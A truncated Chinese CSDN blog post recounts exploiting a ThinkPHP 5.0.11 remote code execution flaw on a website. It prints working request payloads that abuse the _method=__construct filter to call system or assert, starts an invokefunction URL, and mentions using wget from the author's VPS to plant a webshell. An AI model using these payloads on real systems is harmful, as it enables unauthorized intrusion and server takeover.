记一次tp5.0.11rce

本文详细记录了一次针对TP5.0.11的远程代码执行(RCE)渗透测试过程。作者首先描述了如何通过错误提示找到漏洞,然后尝试使用不同exp进行攻击,遇到的阻碍如函数限制、WAF过滤等,并逐步解决,最终成功获取shell。过程中还涉及到文件下载、数据库连接限制的绕过方法,以及利用php7日志实现shell的方法。
摘要由CSDN通过智能技术生成

今天很有感触,我决定从今天开始记录我在ax的点点滴滴,自己的学长都是一步一个脚印走出来,加油,阿鑫。

首先进入网站,xxxx/ 随便输入xxx/admin 然后报错
在这里插入图片描述
然后去网上搜索tp5.0.11的exp打,然后找了一个exp,这tm不直接渗透结束?
在这里插入图片描述
然后看了一下函数,禁止了system,assert函数
在这里插入图片描述
这里再附上几个exp,如果没有禁,可以直接打,

_method=__construct&filter[]=system&method=get&get[]=phpinfo
_method=__construct&filter[]=assert&server[]=phpinfo&get[]=phpinfo
然后我就用了宁外一个exp
wget自己的vps下马,
http://5.com/index.php?s=portal/\think\app/invokefunction&function=call_user_

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值